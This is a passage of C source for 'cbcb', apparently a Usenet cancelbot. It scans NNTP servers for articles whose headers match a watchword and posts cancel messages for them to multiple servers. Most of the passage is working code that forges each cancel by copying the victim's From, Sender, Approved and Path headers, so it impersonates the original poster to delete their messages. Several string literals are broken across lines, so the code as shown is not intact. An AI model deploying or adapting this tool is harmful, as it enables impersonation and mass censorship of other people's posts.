char *szempty="";

int nretry; /* number of retries in various places */
int nbytes;
int host1,host2,i,j;   /* loop indices */

#define NOLDHEADERS 8
/* We're interested in 8 original headers :

Path:               0         (requires special handling)
From:               1
Sender:             2
Approved:           3
Newsgroups:         4
Date:               5
Subject:            6
Organization:       7

*/

char *h_ptr[NOLDHEADERS];
char *t_ptr[3];

/* ANSI function prototypes */
int cbcb_parse_hosts(void);
int cbcb_parse_targets(void);
int cbcb_process_target(void);
int cbcb_parse_message_ids(void);
int cbcb_process_article(char *);
int cbcb_get_headers(void);
void cbcb_save_headers(void);
void cbcb_save_header(int);
int cbcb_flush_sock(int);
int cbcb_test_sock(int);
int cbcb_recv_resp(int,char);
int cbcb_copy_buffer(char *);

int main(int argc,char*argv[])
{

/* process the arguments */

if (argc<3 || argc>5)
 {
 fprintf(stderr,"Usage: cbcb hostfile targetfile [datestamp] [timestamp]
");
 return(1);
 }

if (argc<4)
 datestamp="900101";
else
 datestamp=argv[3];

if (argc<5)
 timestamp="000000";
else
 timestamp=argv[4];

/* open the hosts file */

if (NULL==(sptr=fopen(argv[1],"r")))
 {
 perror("open()");
 fprintf(stderr,"cbcb cannot open hosts file %s
",argv[1]);
 return(0);
 }

/* open the target file */

if (NULL==(tptr=fopen(argv[2],"r")))
 {
 perror("open()");
 fprintf(stderr,"cbcb cannot open target file %s
",argv[2]);
 return(0);
 }

#ifdef SIGPIPE
signal(SIGPIPE,SIG_IGN); /* ignore broken pipes if this platform knows them */
#endif

/* establish the connections to the NNTP servers */

if (0==cbcb_parse_hosts())
 {
 fprintf(stderr,"cbcb unable to connect to any NNTP servers
");
 return(1);
 }

fclose(sptr);

if (!cbcb_parse_targets())
 {
 fprintf(stderr,"cbcb encountered an error processing targets
");
 return(1);
 }

fclose(tptr);

/* final cleanup */
for (i=0; i<nhosts; i++)
 close_sock(hosts[i].cfd);
#ifdef CBCB_NT
WSACleanup();
#endif

return(0);
}


int cbcb_parse_hosts(void)
{
unsigned long host_ip;
struct hostent *host_struct;
struct in_addr *host_node;
/*
struct servent *sp;
*/
struct sockaddr_in serverUaddr;
#ifdef CBCB_NT
WSADATA wsaData; /* needed for WSAStartup */
#endif

#ifdef CBCB_NT
if (WSAStartup(MAKEWORD(1,1),&wsaData))
 {
 perror_sock("WSAStartup()");
 fprintf(stderr,"couldn't start up WinSock
");
 return(0);
 }
fprintf(stderr,"Found WinSock: %s
",wsaData.szDescription);
#endif

#ifdef CBCB_OS2
if (0!=sock_init())
 {
 perror_sock("sock_init()");
 fprintf(stderr,"couldn't start up sockets - is inet.sys running?
");
 return(0);
 }
#endif

/*
if (NULL==(sp=getservbyname("nntp","tcp")))
 {
 fprintf(stderr,"Can't find the NNTP port
");
 return(0);
 }
...
serverUaddr.sin_port=(sp->s_port);
*/

/* loop on the hosts file */
nhosts=0;
file_rec=0;
while(NULL!=fgets(buffer,sizeof(buffer),sptr))
 {
 file_rec++;
 if (*buffer=='#')
  continue;
 if (nhosts>=MAXHOSTS)
  {
  fprintf(stderr,"Please increase MAXHOSTS
");
  break;
  }
 if (5!=sscanf(buffer,"%2048s %hd %c %c %d",
  hostname,&port,&hosts[nhosts].newnews_flag,&hosts[nhosts].post_flag,
  &hosts[nhosts].timeout))
  {
  fprintf(stderr,"Error parsing host file line %d "%s"
",file_rec,buffer);
  continue;
  }
 /* verify that the newnews flag is Y or N */
 if (hosts[nhosts].newnews_flag=='n')
  hosts[nhosts].newnews_flag='N';
 else if (hosts[nhosts].newnews_flag=='y')
  hosts[nhosts].newnews_flag='Y';
 else if (hosts[nhosts].newnews_flag!='Y'&&hosts[nhosts].newnews_flag!='N')
  {
  fprintf(stderr,"Newnews flag %c, must be Y or N on line %d
",
   hosts[nhosts].newnews_flag,file_rec);
  continue;
  }
 /* verify that the posting flag is P, or I, or N */
 if (hosts[nhosts].post_flag=='i')
  hosts[nhosts].post_flag='I';
 else if (hosts[nhosts].post_flag=='p')
  hosts[nhosts].post_flag='P';
 else if (hosts[nhosts].post_flag=='n')
  hosts[nhosts].post_flag='N';
 else if (hosts[nhosts].post_flag!='I'&&hosts[nhosts].post_flag!='P'&&hosts[nhosts].post_flag!='N')
  {
  fprintf(stderr,"Posting flag %c, must be I, or P, or N on line %d
",
   hosts[nhosts].post_flag,file_rec);
  continue;
  }
 /* translate the hostname into an ip address. If it starts with a digit,
 try to interpret it as a A.B.C.D address */
 if (!isdigit(*hostname)||(0xFFFFFFFF==(host_ip=inet_addr(hostname))))
  {
  if (NULL==(host_struct=gethostbyname(hostname)))
   {
   perror("gethostbyname");
   fprintf(stderr,"Can't resolve host name %s to ip on line %d
",
    hostname,file_rec);
   continue;
   }
  host_node=(struct in_addr*)host_struct->h_addr;
  fprintf(stderr,"Note: Using NNTP server at %s
",inet_ntoa(*host_node));
  host_ip=host_node->s_addr;
  }

 /* fill in the address to connect to */
 memset(&serverUaddr,0,sizeof(serverUaddr));
 serverUaddr.sin_family=PF_INET;
 serverUaddr.sin_addr.s_addr=/*htonl*/(host_ip); /* already in net order */
 serverUaddr.sin_port=htons(port);

 /* try to create a socket */
 if ((hosts[nhosts].cfd=socket(AF_INET,SOCK_STREAM,0))<0)
  {
  perror_sock("socket()");
  continue;
  }

conn1:
 if (0>=connect(hosts[nhosts].cfd,(struct sockaddr*)&serverUaddr,sizeof(serverUaddr)))
  goto conn2; /* we use goto so we can use continue */
 if (nretry>10)
  {
  fprintf(stderr,"give up trying to connect to %s port %hd on line %d
",
   hostname,port,file_rec);
  close_sock(hosts[nhosts].cfd);
  hosts[nhosts].newnews_flag=hosts[nhosts].post_flag='N';
  continue;
  }
 perror_sock("connect()");
 nretry++;
 sleep(1);
 goto conn1;
conn2:
 if (!cbcb_recv_resp(nhosts,'2'))
  {
  fprintf(stderr,"NNTP problem after connecting to %s port %hd on line %d
",
   hostname,port,file_rec);
  close_sock(hosts[nhosts].cfd);
  hosts[nhosts].newnews_flag=hosts[nhosts].post_flag='N';
  continue;
  }
 nhosts++;
 }

return(nhosts);
}

int cbcb_parse_targets(void)
{

file_rec=0;
while(fgets(buffer,sizeof(buffer),tptr)) /* read a target line */
 {
 file_rec++;
 if (*buffer=='#') /* comment */
  continue;
 /* parse the buffer into the 8 fields */

 if (9!=sscanf(buffer,"%2048s %2048s %c %2048s %2048s %d %2048s %2048s %2048s",
  newsgroups, watchword, &subject_flag, cmsg_id_prefix, path_const,
  &path_num, hdr_fname, txt_fname, extra_ngrp))
  {
  fprintf(stderr,"Error parsing 8 fields on line %d "%s"
",
  file_rec,buffer);
  continue;
  }

/* verify that the subject flag is C, O, or N */

 if (subject_flag=='c')
  subject_flag='C';
 else if (subject_flag=='o')
  subject_flag='O';
 else if (subject_flag=='n')
  subject_flag='N';
 else if (subject_flag!='C'&&subject_flag!='O'&&subject_flag!='N')
  {
  fprintf(stderr,"Subject flag %c, must be C, O, or N on line %d
",
   subject_flag,file_rec);
  continue;
  }

  if (0==strcmp(path_const,sznone)) /* if 'none' is specified */
   {
   if (path_num==0)
    {
    fprintf(stderr,"Can't have path_const none and path_num 0
");
    continue;
    }
   path_const[0]=0;
   }
  else /* if not none, append bang if needed */
   {
   i=strlen(path_const);
   if (path_const[i-1]!='!')
    {
    path_const[i]='!';
    path_const[i+1]=0;
    }
   }

  if (0==strcmp(extra_ngrp,sznone)) /* if 'none' is specified */
   extra_ngrp[0]=0;
  else /* if not none, append comma if needed */
   {
   i=strlen(extra_ngrp);
   if (extra_ngrp[i-1]!=',')
    {
    extra_ngrp[i]=',';
    extra_ngrp[i+1]=0;
    }
   }

 /* read the extra header lines */

  if (0==strcmp(hdr_fname,sznone)) /* if 'none' is specified */
   *extra_header=0;
  else
   {
   /* try to open the specified file */
   if (NULL==(sptr=fopen(hdr_fname,"r")))
    {
    perror("open()");
    fprintf(stderr,"cbcb cannot open extra-header file %s
",hdr_fname);
    continue;
    }
   nbytes=fread(buffer,1,BUFFERSIZE,sptr);
   fclose(sptr);
   if (nbytes>=BUFFERSIZE)
    fprintf(stderr,"extra-header file %s is too long
",hdr_fname);
   if (!cbcb_copy_buffer(extra_header))
    {
    fprintf(stderr,"error in header file
");
    continue;
    }
   }

 /* read the body the same way */

  if (0==strcmp(txt_fname,sznone)) /* if 'none' is specified */
   strcpy(extra_body,"Please cancel this article
");
  else
   {
   /* try to open the specified file */
   if (NULL==(sptr=fopen(txt_fname,"r")))
    {
    perror("open()");
    fprintf(stderr,"cbcb cannot open body file %s
",txt_fname);
    continue;
    }
   nbytes=fread(buffer,1,BUFFERSIZE,sptr);
   fclose(sptr);
   if (nbytes>=BUFFERSIZE)
    fprintf(stderr,"body file %s is too long
",txt_fname);
   if (!cbcb_copy_buffer(extra_body))
    {
    fprintf(stderr,"error in body file
");
    continue;
    }
  }

 if (!cbcb_process_target()) /* process otherwise. warn and go on if error */
  fprintf(stderr,"cbcb encountered a problem processing target, line %d
",
   file_rec);
 }

return(1);
}

int cbcb_process_target(void)
{

/* loop on hosts */
for (host1=0; host1<nhosts; host1++)
 if (hosts[host1].newnews_flag=='Y') /* if we want to get message-ids from it */
  {
  cbcb_flush_sock(hosts[host1].cfd);

  /* compose the rfc 977 newnews command.  Ansi C would let us write
  nbytes=sprintf(..), but gcc has a non-compilant sprintf which return
  buffer instead, so we must use strlen */
  sprintf(buffer,"NEWNEWS %s %s %s GMT
",
   newsgroups,datestamp,timestamp);
  nbytes=strlen(buffer);
  /* send the command to the server */
  if (nbytes!=send(hosts[host1].cfd,buffer,nbytes,0))
   {
   perror_sock("NEWNEWS send()");
   continue;
   }
  /* the server is supposed to return a list of message-ids now */
  if (!cbcb_parse_message_ids())
   fprintf(stderr,"Problem parsing message-ids
");
   /* no 'continue': even if we return a partial queue, try to process it */

  /* loop through headers, newest first */
  while (msg_queue)
   {
   msg_t=msg_queue;
   if (!cbcb_process_article(msg_queue->msgid))
    fprintf(stderr,"Problem processing article <%s>
",msg_queue->msgid);
   msg_queue=msg_queue->next;
   free(msg_t);
   }

  }

return(1);
}


int cbcb_parse_message_ids(void)
{

msg_queue=NULL;
parse_state=7;

nretry=0;
recv_msgids:
 if (!cbcb_test_sock(hosts[host1].cfd)) /* nothing to read */
 {
 if (nretry>hosts[host1].timeout)
  {
  fprintf(stderr,"timeout waiting to recv message-ids
");
  return(0);
  }
 fprintf(stderr,".");
 nretry++;
 sleep(1);
 goto recv_msgids;
 }
nbytes=recv(hosts[host1].cfd,buffer,sizeof(buffer),0);
if (nbytes<0) /* an error shouldn't happen here */
 {
 perror_sock("NEWNEWS recv()");
 return(0);
 }
#ifdef DEBUG
 fwrite(buffer,1,nbytes,stdout); /* for debugging only!! */
#endif
/* now see if what we received makes sense */
for (i=0; i<nbytes; i++)
 {
 switch(parse_state)
  {
 case 0:
  if (buffer[i]=='.')
   parse_state=4;
  else if (buffer[i]!='<')
   goto recv_bad_msg_id;
  else
   {
   j=0;
   parse_state=1;
   }
  break;
 case 1:
  if (buffer[i]=='>')
   {
/* add to the queue */
   msg_t=(struct _msgidq*)malloc(sizeof(struct _msgidq));
   if (msg_t==NULL)
    {
    fprintf(stderr,"malloc failed
");
    return(0);
    }
   msg_t->msgid=(char*)malloc(j+1);
   if (msg_t->msgid==NULL)
    {
    free(msg_t);
    fprintf(stderr,"malloc failed
");
    return(0);
    }
   memcpy(msg_t->msgid,buffer_big,j);
   *(msg_t->msgid+j)=0;
   msg_t->next=msg_queue;
   msg_queue=msg_t;

   parse_state=2;
   }
  else
   {
   if (j>=BUFFERBIGSIZE)
    {
    fprintf(stderr,"Please increase BUFFERBIGSIZE
");
    return(0);
    }
   buffer_big[j]=buffer[i];
   j++;
   /* parse_state=1; */
   }
  break;
 case 2:
  if (buffer[i]==ASCII_CR)
   parse_state=3;
  else
   goto recv_bad_msg_id;
  break;
 case 3:
  if (buffer[i]==ASCII_LF)
   parse_state=0;
  else
   goto recv_bad_msg_id;
  break;
 case 4:
  if (buffer[i]==ASCII_CR)
   parse_state=5;
  else
   goto recv_bad_msg_id;
  break;
 case 5:
  if (buffer[i]==ASCII_LF)
   parse_state=6;
  else
   goto recv_bad_msg_id;
  break;
 case 6:  /* more data after final . */
   goto recv_bad_msg_id;
 case 7: /* initial, really */
  if (buffer[i]=='2')
   parse_state=8;
  else
   goto recv_bad_msg_id;
  break;
 case 8:
  if (buffer[i]==ASCII_CR)
    parse_state=3;
  break;
  }
 }

if (parse_state!=6)
 goto recv_msgids;
/* normal competion */
return(1);

recv_bad_msg_id:
 fprintf(stderr,"Unexpected response (expected message-ids) ");
 if (i)
  {
  fprintf(stderr,"after "");
  fwrite(buffer,1,i,stderr);
  fprintf(stderr,"" ");
  }
 if (i<nbytes)
  {
  fprintf(stderr,"before "");
  fwrite(buffer+i,1,nbytes-i,stderr);
  fprintf(stderr,""");
  }
 fprintf(stderr,"
");
return(0);
}

int cbcb_process_article(char *msgid)
{

/* if there is any leftover data in the socket, get it out */
 cbcb_flush_sock(hosts[host1].cfd);

/* compose the rfc 977 head command */
sprintf(buffer,"HEAD <%s>
",msgid);

/* send the command to the server */
nbytes=strlen(buffer);
if (nbytes!=send(hosts[host1].cfd,buffer,nbytes,0))
 {
 perror_sock("HEAD send()");
 return(0);
 }

/* the server is supposed to return the article headers now */

if (!cbcb_get_headers())
 {
 fprintf(stderr,"Problem retrieving headers
");
 return(0);
 }

if (!strstr(buffer_big,watchword))
 return(1); /* no match, nothing to do */

/* found the watchword: let's cancel */
cbcb_save_headers();
sprintf(buffer_big,"\nPath: %s%s
\nFrom:%s
\nSender:%s
\nApproved:%s
\nNewsgroups: %s%s
\nDate:%s
\n%s%s%s\nOrganization:%s
\nControl:%s
\nMessage-ID: <%s%s>
\n%s\n
\n%s\n.
",
path_const,
h_ptr[0],h_ptr[1],h_ptr[2],h_ptr[3],extra_ngrp,h_ptr[4],h_ptr[5],
t_ptr[0],h_ptr[6],t_ptr[1],h_ptr[7],t_ptr[2],
cmsg_id_prefix,msgid,extra_header,extra_body);

fputs(buffer_big,stderr); /* to see what we're posting */

for (host2=0; host2<nhosts; host2++)
 if (hosts[host2].post_flag=='P'||hosts[host2].post_flag=='I')
  {
  cbcb_flush_sock(hosts[host2].cfd);
  if (hosts[host2].post_flag=='P')
   {
   /* send the command to the server */
   if (6!=send(hosts[host2].cfd,"POST
",6,0))
    {
    perror_sock("POST send()");
    continue;
    }
   }
  else /*hosts[host2].post_flag=='I') */
   {
   sprintf(buffer,"IHAVE <%s%s>
",cmsg_id_prefix,msgid);
   nbytes=strlen(buffer);
   /* send the command to the server */
   if (nbytes!=send(hosts[host2].cfd,buffer,nbytes,0))
    {
    perror_sock("IHAVE send()");
    continue;
    }
   }
  if (!cbcb_recv_resp(host2,'3'))
   {
   fprintf(stderr,"NNTP problem while trying to post
");
   continue;
   }
  nbytes=strlen(buffer_big);
  if (nbytes!=send(hosts[host2].cfd,buffer_big,nbytes,0))
   {
   perror_sock("article send()");
   continue;
   }
  if (!cbcb_recv_resp(host2,'2'))
   {
   fprintf(stderr,"NNTP problem after posting
");
   continue;
   }
  }

return(1); /* all's well */
}

int cbcb_get_headers(void)
{

h_ptr[0]=h_ptr[1]=h_ptr[2]=h_ptr[3]=h_ptr[4]=h_ptr[5]=h_ptr[6]=h_ptr[7]=NULL;
h_flag=d_flag=parse_state=0;
nretry=0;
j=0;
/* recv */
recv_headers:

 if (!cbcb_test_sock(hosts[host1].cfd)) /* nothing to read */
 {
 if (nretry>hosts[host1].timeout)
  {
  fprintf(stderr,"timeout waiting to recv article headers
");
  return(0);
  }
 fprintf(stderr,".");
 nretry++;
 sleep(1);
 goto recv_headers;
 }

nbytes=recv(hosts[host1].cfd,buffer,sizeof(buffer),0);
if (nbytes<0) /* an error shouldn't happen here */
 {
 perror_sock("headers recv()");
 return(0);
 }
#ifdef DEBUG
 fwrite(buffer,1,nbytes,stdout); /* for debugging only!! */
#endif
/* see if what we received makes sense */
for (i=0; i<nbytes; i++)
 {
 switch(parse_state)
  {
 case 0:
  if (buffer[i]=='2')
   parse_state=1;
  else
   goto recv_bad_header;
  break;
 case 1:
  if (buffer[i]=='2')
   parse_state=2;
  else
   goto recv_bad_header;
  break;
 case 2:
  if (buffer[i]==ASCII_CR)
   parse_state=3;
 /*
  else
   parse_state=2;
 */
  break;
 case 3:
  if (buffer[i]==ASCII_LF)
   {
   if (d_flag)
    parse_state=5;
   else
    {
    h_flag=1;
    parse_state=4;
    goto recv_header_save;
    }
   }
  else
   goto recv_bad_header;
  break;
 case 4:
  if (buffer[i]==ASCII_CR) /* don't save cr's */
   parse_state=3;
  else
   {
   if (h_flag)
    {
    d_flag=0;
    if (buffer[i]=='.')
     d_flag=1;
    else if (buffer[i]=='p'||buffer[i]=='P')
     parse_state=10;
    else if (buffer[i]=='f'||buffer[i]=='F')
     parse_state=20;
    else if (buffer[i]=='s'||buffer[i]=='S')
     parse_state=30;
    else if (buffer[i]=='a'||buffer[i]=='A')
     parse_state=40;
    else if (buffer[i]=='n'||buffer[i]=='N')
     parse_state=50;
    else if (buffer[i]=='d'||buffer[i]=='D')
     parse_state=60;
    else if (buffer[i]=='o'||buffer[i]=='O')
     parse_state=70;
    else if (buffer[i]==' '||buffer[i]=='	') /* space means continuation */
     j--; /* backup over the lf */
    h_flag=0;
    }
   else
    d_flag=0;
   goto recv_header_save;
   }
  break;
 case 5:  /* more data after the final . */
   goto recv_bad_header;
/* we recognize these headers on the fly */
 case 10:
    if (buffer[i]=='a'||buffer[i]=='A')
     parse_state=11;
    else
     parse_state=4;
   goto recv_header_save;
 case 11:
    if (buffer[i]=='t'||buffer[i]=='t')
     parse_state=12;
    else
     parse_state=4;
   goto recv_header_save;
 case 12:
    if (buffer[i]=='h'||buffer[i]=='H')
     parse_state=13;
    else
     parse_state=4;
   goto recv_header_save;
 case 13:
    if (buffer[i]==':')
     h_ptr[0]=buffer_big+j+1; /* Path: */
    parse_state=4;
   goto recv_header_save;
 case 20:
    if (buffer[i]=='r'||buffer[i]=='R')
     parse_state=21;
    else
     parse_state=4;
   goto recv_header_save;
 case 21:
    if (buffer[i]=='o'||buffer[i]=='O')
     parse_state=22;
    else
     parse_state=4;
   goto recv_header_save;
 case 22:
    if (buffer[i]=='m'||buffer[i]=='M')
     parse_state=23;
    else
     parse_state=4;
   goto recv_header_save;
 case 23:
    if (buffer[i]==':')
     h_ptr[1]=buffer_big+j+1; /* From: */
    parse_state=4;
   goto recv_header_save;
 case 30:
    if (buffer[i]=='e'||buffer[i]=='E')
     parse_state=31;
    else if (buffer[i]=='u'||buffer[i]=='U')
     parse_state=90;
    else
     parse_state=4;
   goto recv_header_save;
 case 31:
    if (buffer[i]=='n'||buffer[i]=='N')
     parse_state=32;
    else
     parse_state=4;
   goto recv_header_save;
 case 32:
    if (buffer[i]=='d'||buffer[i]=='D')
     parse_state=33;
    else
     parse_state=4;
   goto recv_header_save;
 case 33:
    if (buffer[i]=='e'||buffer[i]=='E')
     parse_state=34;
    else
     parse_state=4;
   goto recv_header_save;
 case 34:
    if (buffer[i]=='r'||buffer[i]=='R')
     parse_state=35;
    else
     parse_state=4;
   goto recv_header_save;
 case 35:
    if (buffer[i]==':')
     h_ptr[2]=buffer_big+j+1; /* Sender: */
    parse_state=4;
   goto recv_header_save;
 case 40:
    if (buffer[i]=='p'||buffer[i]=='P')
     parse_state=41;
    else
     parse_state=4;
   goto recv_header_save;
 case 41:
    if (buffer[i]=='p'||buffer[i]=='P')
     parse_state=42;
    else
     parse_state=4;
   goto recv_header_save;
 case 42:
    if (buffer[i]=='r'||buffer[i]=='R')
     parse_state=43;
    else
     parse_state=4;
   goto recv_header_save;
 case 43:
    if (buffer[i]=='o'||buffer[i]=='O')
     parse_state=44;
    else
     parse_state=4;
   goto recv_header_save;
 case 44:
    if (buffer[i]=='v'||buffer[i]=='V')
     parse_state=45;
    else
     parse_state=4;
   goto recv_header_save;
 case 45:
    if (buffer[i]=='e'||buffer[i]=='E')
     parse_state=46;
    else
     parse_state=4;
   goto recv_header_save;
 case 46:
    if (buffer[i]=='d'||buffer[i]=='D')
     parse_state=47;
    else
     parse_state=4;
   goto recv_header_save;
 case 47:
    if (buffer[i]==':')
     h_ptr[3]=buffer_big+j+1; /* Approved: */
    parse_state=4;
   goto recv_header_save;
 case 50:
    if (buffer[i]=='e'||buffer[i]=='E')
     parse_state=51;
    else
     parse_state=4;
   goto recv_header_save;
 case 51:
    if (buffer[i]=='w'||buffer[i]=='W')
     parse_state=52;
    else
     parse_state=4;
   goto recv_header_save;
 case 52:
    if (buffer[i]=='s'||buffer[i]=='S')
     parse_state=53;
    else
     parse_state=4;
   goto recv_header_save;
 case 53:
    if (buffer[i]=='g'||buffer[i]=='G')
     parse_state=54;
    else
     parse_state=4;
   goto recv_header_save;
 case 54:
    if (buffer[i]=='r'||buffer[i]=='R')
     parse_state=55;
    else
     parse_state=4;
   goto recv_header_save;
 case 55:
    if (buffer[i]=='o'||buffer[i]=='O')
     parse_state=56;
    else
     parse_state=4;
   goto recv_header_save;
 case 56:
    if (buffer[i]=='u'||buffer[i]=='U')
     parse_state=57;
    else
     parse_state=4;
   goto recv_header_save;
 case 57:
    if (buffer[i]=='p'||buffer[i]=='P')
     parse_state=58;
    else
     parse_state=4;
   goto recv_header_save;
 case 58:
    if (buffer[i]=='s'||buffer[i]=='S')
     parse_state=59;
    else
     parse_state=4;
   goto recv_header_save;
 case 59:
    if (buffer[i]==':')
     h_ptr[4]=buffer_big+j+2; /* Newsgroups:, skip space */
    parse_state=4;
   goto recv_header_save;
 case 60:
    if (buffer[i]=='a'||buffer[i]=='A')
     parse_state=61;
    else
     parse_state=4;
   goto recv_header_save;
 case 61:
    if (buffer[i]=='t'||buffer[i]=='T')
     parse_state=62;
    else
     parse_state=4;
   goto recv_header_save;
 case 62:
    if (buffer[i]=='e'||buffer[i]=='E')
     parse_state=63;
    else
     parse_state=4;
   goto recv_header_save;
 case 63:
    if (buffer[i]==':')
     h_ptr[5]=buffer_big+j+1; /* Date: */
    parse_state=4;
   goto recv_header_save;
 case 70:
    if (buffer[i]=='r'||buffer[i]=='R')
     parse_state=71;
    else
     parse_state=4;
   goto recv_header_save;
 case 71:
    if (buffer[i]=='g'||buffer[i]=='G')
     parse_state=72;
    else
     parse_state=4;
   goto recv_header_save;
 case 72:
    if (buffer[i]=='a'||buffer[i]=='A')
     parse_state=73;
    else
     parse_state=4;
   goto recv_header_save;
 case 73:
    if (buffer[i]=='n'||buffer[i]=='N')
     parse_state=74;
    else
     parse_state=4;
   goto recv_header_save;
 case 74:
    if (buffer[i]=='i'||buffer[i]=='I')
     parse_state=75;
    else
     parse_state=4;
   goto recv_header_save;
 case 75:
    if (buffer[i]=='z'||buffer[i]=='Z')
     parse_state=76;
    else
     parse_state=4;
   goto recv_header_save;
 case 76:
    if (buffer[i]=='a'||buffer[i]=='A')
     parse_state=77;
    else
     parse_state=4;
   goto recv_header_save;
 case 77:
    if (buffer[i]=='t'||buffer[i]=='T')
     parse_state=78;
    else
     parse_state=4;
   goto recv_header_save;
 case 78:
    if (buffer[i]=='i'||buffer[i]=='I')
     parse_state=79;
    else
     parse_state=4;
   goto recv_header_save;
 case 79:
    if (buffer[i]=='o'||buffer[i]=='O')
     parse_state=80;
    else
     parse_state=4;
   goto recv_header_save;
 case 80:
    if (buffer[i]=='n'||buffer[i]=='N')
     parse_state=81;
    else
     parse_state=4;
   goto recv_header_save;
 case 81:
    if (buffer[i]==':')
     h_ptr[7]=buffer_big+j+1; /* Organization: */
    parse_state=4;
   goto recv_header_save;
 case 90:
    if (buffer[i]=='b'||buffer[i]=='B')
     parse_state=91;
    else
     parse_state=4;
   goto recv_header_save;
 case 91:
    if (buffer[i]=='j'||buffer[i]=='J')
     parse_state=92;
    else
     parse_state=4;
   goto recv_header_save;
 case 92:
    if (buffer[i]=='e'||buffer[i]=='E')
     parse_state=93;
    else
     parse_state=4;
   goto recv_header_save;
 case 93:
    if (buffer[i]=='c'||buffer[i]=='C')
     parse_state=94;
    else
     parse_state=4;
   goto recv_header_save;
 case 94:
    if (buffer[i]=='t'||buffer[i]=='T')
     parse_state=95;
    else
     parse_state=4;
   goto recv_header_save;
 case 95:
    if (buffer[i]==':')
     h_ptr[6]=buffer_big+j+1; /* Subject: */
   parse_state=4;
   goto recv_header_save;
 default: /* how could we ever get here? */
  goto recv_bad_header;
  }
 continue; /* ugly, branch around save */
recv_header_save:
 if (j>=BUFFERBIGSIZE)
  {
  fprintf(stderr,"Please increase BUFFERBIGSIZE
");
  return(0);
  }
 buffer_big[j++]=buffer[i];
 } /* next i */
if (parse_state!=5)
 goto recv_headers;

return(1);
recv_bad_header:
 fprintf(stderr,"Unexpected response (expected headers) ");
 if (i)
  {
  fprintf(stderr,"after "");
  fwrite(buffer,1,i,stderr);
  fprintf(stderr,"" ");
  }
 if (i<nbytes)
  {
  fprintf(stderr,"before "");
  fwrite(buffer+i,1,nbytes-i,stderr);
  fprintf(stderr,""");
  }
 fprintf(stderr,"
");
return(0);
}

void cbcb_save_headers(void)
{
/* now copy old headers to buffer for safekeeping */
/* only if buffer_big matched the pattern */

/* only Path: is special: no initial space */
if (h_ptr[0]==NULL) /* no path */
 {
 j=0;
 h_ptr[0]=" ";
 }
else
 {
 i=h_ptr[0]-buffer_big;
 j=path_num;
 while (buffer_big[i]!=ASCII_LF)
  i++;
 i--;
 /* now go back and look for the last n bang-separated components, or the
 beginning of path */
 while (buffer_big[i]>' ' && j)
  {
  i--;
  if (buffer_big[i]=='!')
   j--;
  }
 i++;
 j=0;
 h_ptr[0]=buffer;
 while (buffer_big[i]!=ASCII_LF)
  buffer[j++]=buffer_big[i++];
 buffer[j++]=0;
 }

t_ptr[2]=buffer+j;
sprintf(t_ptr[2]," cancel <%s>",msg_queue->msgid);
j+=strlen(t_ptr[2])+1;

if (h_ptr[1]==NULL) /* no from? Highly unlikely */
 h_ptr[1]=szcabal;
else
 cbcb_save_header(1);
if (h_ptr[2]==NULL) /* sender */
 h_ptr[2]=h_ptr[1];
else
 cbcb_save_header(2);
if (h_ptr[3]==NULL) /* approved */
 h_ptr[3]=h_ptr[2];
else
 cbcb_save_header(3);
if (h_ptr[4]==NULL) /* no newsgroups? */
 h_ptr[4]="control";
else
 cbcb_save_header(4);
if (h_ptr[5]==NULL) /* no date??? */
 h_ptr[5]=" 1 Jan 1990 00:00 GMT";
else
 cbcb_save_header(5);
/* subject is special - must use flag */
if (subject_flag=='O')
 {
 if (h_ptr[6]==NULL)
  h_ptr[6]=szcabal; /* no subject??? */
 else
  cbcb_save_header(6);
 t_ptr[0]=szsubject;
 t_ptr[1]=szendl;
 }
else if (subject_flag=='C')
 {
 h_ptr[6]=t_ptr[2]; /* same as the Control: */
 t_ptr[0]=szsubjectc;
 t_ptr[1]=szendl;
 }
else /* if (subject_flag=='N') */
 {
t_ptr[0]=t_ptr[1]=h_ptr[6]=szempty;
 }
if (h_ptr[7]==NULL) /* organization */
 h_ptr[7]=szcabal;
else
 cbcb_save_header(7);

#ifdef DEBUG
for (i=0; i<8; i++)
 if (h_ptr[i])
  printf("%d:%s
",i,h_ptr[i]);
#endif

}

void cbcb_save_header(int k)
{
i=h_ptr[k]-buffer_big;
h_ptr[k]=buffer+j;
while (buffer_big[i]!=ASCII_LF)
 buffer[j++]=buffer_big[i++];
buffer[j++]=0;
}

int cbcb_flush_sock(int sock)
{
  /* if there is any leftover data in the socket, get it out */
  while (cbcb_test_sock(sock))
   {
   nbytes=recv(sock,buffer,sizeof(buffer),0);
   if (nbytes<0)
    perror_sock("flush recv()"); /* but don't abort */
   else
    fwrite(buffer,1,nbytes,stderr); /* display it, as it may be informative */
   }
return(1);
}

/* use select to see if there's data here.
There don't seem to be any unixes left which understand poll and not select.*/
int cbcb_test_sock(int sock)
{
fd_set setm;
static struct timeval zerotime={0,0};

FD_ZERO(&setm);
FD_SET(sock,&setm);
if (select(sock+1,&setm,NULL,NULL,&zerotime)<0)
 {
 perror_sock("select()");
 }
if (FD_ISSET(sock,&setm))
 return(1);
else
 return(0);
}

int cbcb_recv_resp(int host,char c)
{

parse_state=0;

nretry=0;
recv_resp:
 if (!cbcb_test_sock(hosts[host].cfd)) /* nothing to read */
 {
 if (nretry>hosts[host].timeout)
  {
  fprintf(stderr,"timeout waiting to recv response
");
  return(0);
  }
 fprintf(stderr,".");
 nretry++;
 sleep(1);
 goto recv_resp;
 }
nbytes=recv(hosts[host].cfd,buffer,sizeof(buffer),0);
if (nbytes<0) /* an error shouldn't happen here */
 {
 perror_sock("response recv()");
 return(0);
 }
/* #ifdef DEBUG */
 fwrite(buffer,1,nbytes,stdout); /* for debugging only!! */
/* #endif */
/* now see if what we received makes sense */
for (i=0; i<nbytes; i++)
 {
 switch(parse_state)
  {
 case 0:
  if (buffer[i]==c)
   parse_state=1;
  else
   goto recv_bad_resp;
  break;
 case 1:
  if (buffer[i]==ASCII_CR)
    parse_state=2;
  break;
 case 2:
  if (buffer[i]==ASCII_LF)
   parse_state=3;
  else
   goto recv_bad_resp;
  break;
 case 3:  /* more data after final 
 */
   goto recv_bad_resp;
  }
 }

if (parse_state!=3)
 goto recv_resp;
/* normal competion */
return(1);

recv_bad_resp:
 fprintf(stderr,"Unexpected response (expected %cxx message) ",c);
 if (i)
  {
  fprintf(stderr,"after "");
  fwrite(buffer,1,i,stderr);
  fprintf(stderr,"" ");
  }
 if (i<nbytes)
  {
  fprintf(stderr,"before "");
  fwrite(buffer+i,1,nbytes-i,stderr);
  fprintf(stderr,""");
  }
 fprintf(stderr,"
");
return(0);
}

int cbcb_copy_buffer(char *s)
{
i=j=0;
   if (nbytes>0&&buffer[nbytes-1]!='
')
    buffer[nbytes++]='
';
  buffer[nbytes]=0;

while (buffer[i])
 {
